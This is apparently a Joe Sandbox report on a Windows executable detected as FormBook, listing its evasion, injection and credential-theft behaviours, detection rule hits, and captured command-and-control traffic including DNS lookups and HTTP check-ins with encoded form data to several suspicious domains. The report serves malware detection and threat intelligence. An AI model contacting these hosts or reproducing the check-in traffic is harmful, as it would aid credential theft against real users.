Edit tour

Windows Analysis Report
4sfN3Gx1vO.exe

Overview

General Information

Sample name:	4sfN3Gx1vO.exe renamed because original name is a hash value
Original sample name:	e1c5b7a7fa4b308e50aa7061dd1e691cd253f63dc99745977164ec5d5311047a.exe
Analysis ID:	1587791
MD5:	f6f040a290cc9c41a1b07307f12310e5
SHA1:	c34b80ea358bbddc007a7e9054f9d71eee00799f
SHA256:	e1c5b7a7fa4b308e50aa7061dd1e691cd253f63dc99745977164ec5d5311047a
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

4sfN3Gx1vO.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\4sfN3Gx1vO.exe" MD5: F6F040A290CC9C41A1B07307F12310E5)

svchost.exe (PID: 1848 cmdline: "C:\Users\user\Desktop\4sfN3Gx1vO.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

YZKoIsKkwLJWPq.exe (PID: 368 cmdline: "C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

prevhost.exe (PID: 7060 cmdline: "C:\Windows\SysWOW64\prevhost.exe" MD5: 79FED29A7F3DF4BA67599EFF3CDB4F1A)

YZKoIsKkwLJWPq.exe (PID: 2764 cmdline: "C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6520 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.24e0000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.24e0000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", CommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", ParentImage: C:\Users\user\Desktop\4sfN3Gx1vO.exe, ParentProcessId: 4836, ParentProcessName: 4sfN3Gx1vO.exe, ProcessCommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", ProcessId: 1848, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", CommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", ParentImage: C:\Users\user\Desktop\4sfN3Gx1vO.exe, ParentProcessId: 4836, ParentProcessName: 4sfN3Gx1vO.exe, ProcessCommandLine: "C:\Users\user\Desktop\4sfN3Gx1vO.exe", ProcessId: 1848, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:03:35.763872+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49990	104.21.64.1	80	TCP
2025-01-10T18:04:26.663076+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49892	161.97.142.144	80	TCP
2025-01-10T18:04:50.155662+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49982	172.96.187.60	80	TCP
2025-01-10T18:05:04.117065+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49986	185.199.108.153	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:04:42.525231+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49979	172.96.187.60	80	TCP
2025-01-10T18:04:45.239495+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49980	172.96.187.60	80	TCP
2025-01-10T18:04:47.653195+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49981	172.96.187.60	80	TCP
2025-01-10T18:04:56.451357+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49983	185.199.108.153	80	TCP
2025-01-10T18:04:58.992300+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49984	185.199.108.153	80	TCP
2025-01-10T18:05:01.557997+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49985	185.199.108.153	80	TCP
2025-01-10T18:05:10.670177+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49987	104.21.64.1	80	TCP
2025-01-10T18:05:13.233018+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49988	104.21.64.1	80	TCP
2025-01-10T18:05:15.795444+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49989	104.21.64.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 4sfN3Gx1vO.exe	Virustotal: Detection: 72%			Perma Link
Source: 4sfN3Gx1vO.exe	ReversingLabs: Detection: 76%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.24e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3314303554.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3315298026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2392864199.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2393158045.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3315173119.0000000004CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2393615856.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3315527275.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 4sfN3Gx1vO.exe

Joe Sandbox ML: detected

Source: 4sfN3Gx1vO.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: prevhost.pdb source: svchost.exe, 00000002.00000003.2361463674.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393024659.0000000002800000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315017656.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000003.2613211255.0000000000D4B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2318966272.000000000070E000.00000002.00000001.01000000.00000005.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000000.2464236823.000000000070E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: 4sfN3Gx1vO.exe, 00000000.00000003.2085536989.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2084894873.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303728732.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298004446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.000000000309E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2395059467.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.000000000524E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2393104487.0000000004D55000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 4sfN3Gx1vO.exe, 00000000.00000003.2085536989.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, 4sfN3Gx1vO.exe, 00000000.00000003.2084894873.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2393190825.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303728732.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298004446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393190825.000000000309E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, prevhost.exe, 00000005.00000003.2395059467.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.000000000524E000.00000040.00001000.00020000.00000000.sdmp, prevhost.exe, 00000005.00000003.2393104487.0000000004D55000.00000004.00000020.00020000.00000000.sdmp, prevhost.exe, 00000005.00000002.3315582758.00000000050B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: prevhost.pdbGCTL source: svchost.exe, 00000002.00000003.2361463674.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2393024659.0000000002800000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315017656.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000003.2613211255.0000000000D4B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: prevhost.exe, 00000005.00000002.3316055880.00000000056DC000.00000004.10000000.00040000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.00000000033AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2693373993.000000000874C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: prevhost.exe, 00000005.00000002.3316055880.00000000056DC000.00000004.10000000.00040000.00000000.sdmp, prevhost.exe, 00000005.00000002.3314429519.000000000322A000.00000004.00000020.00020000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315842528.00000000033AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2693373993.000000000874C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0057DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0057DBBE
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0054C2A2 FindFirstFileExW,	0_2_0054C2A2
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_005868EE FindFirstFileW,FindClose,	0_2_005868EE
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0058698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0058698F
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0057D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0057D076
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0057D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0057D3A9
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00589642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00589642
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0058979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0058979D
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00589B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00589B2B
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00585C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00585C97
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F6C7C0 FindFirstFileW,FindNextFileW,FindClose,	5_2_02F6C7C0

Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 4x nop then xor eax, eax		5_2_02F59F20
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 4x nop then mov ebx, 00000004h		5_2_04F504DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49892 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 185.199.108.153:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 172.96.187.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 185.199.108.153:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 185.199.108.153:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49982 -> 172.96.187.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 172.96.187.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 172.96.187.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 185.199.108.153:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 104.21.64.1:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.030002513.xyz

Source: Joe Sandbox View	IP Address: 161.97.142.144 161.97.142.144
Source: Joe Sandbox View	IP Address: 172.96.187.60 172.96.187.60
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View	ASN Name: CONTABODE CONTABODE
Source: Joe Sandbox View	ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0058CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0058CE44

Source: global traffic	HTTP traffic detected: GET /95le/?Fz=2jBhVn&gjR=ZgllZHsiydchqBHBA1JMF+RoiwLw/ScJ/Jj32S4NIs+PSlV3776FANxFoYb4iH80r13xZ8RWQuyuUHwO/KTQwNAs4TqSGhVWgu7Bj48jZrfSqhqsOqTV9cKaFb+b133wug== HTTP/1.1Host: www.030002513.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic	HTTP traffic detected: GET /s7cs/?gjR=XBO9aoYe0c4EV2lGWX/eqScH3WB2DUU8GMnJuxCb2bBG6S8RD/F6utRSsBVbsw81jNVeG9r0NAJ+O+sM6di/BOZEjzyU06k1t/5HTi0LrCapjHiQT7axV8Hb4u3QDZSGIw==&Fz=2jBhVn HTTP/1.1Host: www.mbakjisoo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic	HTTP traffic detected: GET /o8v1/?gjR=aBBw/QY72agee++wmgm8YU8t73l2MhHHcyuYQPaRiLcCJdiW+8Frjxd5MkTQnyD8TNGws+KrSP+UmrRcv8qZyBqG40jUHkhwK60VpuN0UbWNahjAXTIav6KJb07qfMmdjQ==&Fz=2jBhVn HTTP/1.1Host: www.pku-cs-cjw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic	HTTP traffic detected: GET /w7eo/?gjR=87jvmPBkWfHORTeDIH6vw6Iilw+7ldDVauNTJPGD6Y0g6pEQO5IgtLUhmq8D9IsvGok6fcDnqazXOW08rDaond58uEkeXckhjfb1cCvnPNMW22V5tJ5baph3pqAG39XDrQ==&Fz=2jBhVn HTTP/1.1Host: www.vilakodsiy.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30

Source: global traffic	DNS traffic detected: DNS query: www.030002513.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mbakjisoo.site
Source: global traffic	DNS traffic detected: DNS query: www.pku-cs-cjw.top
Source: global traffic	DNS traffic detected: DNS query: www.vilakodsiy.sbs

Source: unknown

HTTP traffic detected: POST /s7cs/ HTTP/1.1Host: www.mbakjisoo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.mbakjisoo.siteContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 204Referer: http://www.mbakjisoo.site/s7cs/User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30Data Raw: 67 6a 52 3d 61 44 6d 64 5a 66 30 71 31 75 77 31 55 79 6f 52 4c 33 7a 72 69 6c 4e 2f 37 46 35 57 58 48 55 50 53 62 6e 75 33 57 33 43 74 36 73 39 39 6c 63 4d 48 76 39 32 6d 76 4a 2b 2f 41 77 46 70 55 67 2f 32 65 4e 52 51 4e 32 45 4f 6a 73 61 4c 75 78 5a 74 76 2f 75 65 4d 42 38 6d 43 6e 47 2f 64 59 79 6d 2b 67 47 5a 67 55 31 7a 54 47 33 7a 68 6e 52 42 4f 57 56 55 50 2f 76 68 63 47 57 4b 59 4c 73 61 68 32 50 73 62 4a 4c 49 2f 72 73 49 78 38 78 45 39 44 52 53 7a 34 51 68 51 32 68 5a 65 34 59 67 4d 6f 5a 73 6e 71 50 44 53 6c 48 4c 73 62 38 46 64 74 76 4a 72 78 42 73 6e 36 66 2f 5a 42 4d 6c 32 36 35 57 6e 51 3d Data Ascii: gjR=aDmdZf0q1uw1UyoRL3zrilN/7F5WXHUPSbnu3W3Ct6s99lcMHv92mvJ+/AwFpUg/2eNRQN2EOjsaLuxZtv/ueMB8mCnG/dYym+gGZgU1zTG3zhnRBOWVUP/vhcGWKYLsah2PsbJLI/rsIx8xE9DRSz4QhQ2hZe4YgMoZsnqPDSlHLsb8FdtvJrxBsn6f/ZBMl265WnQ=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:04:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 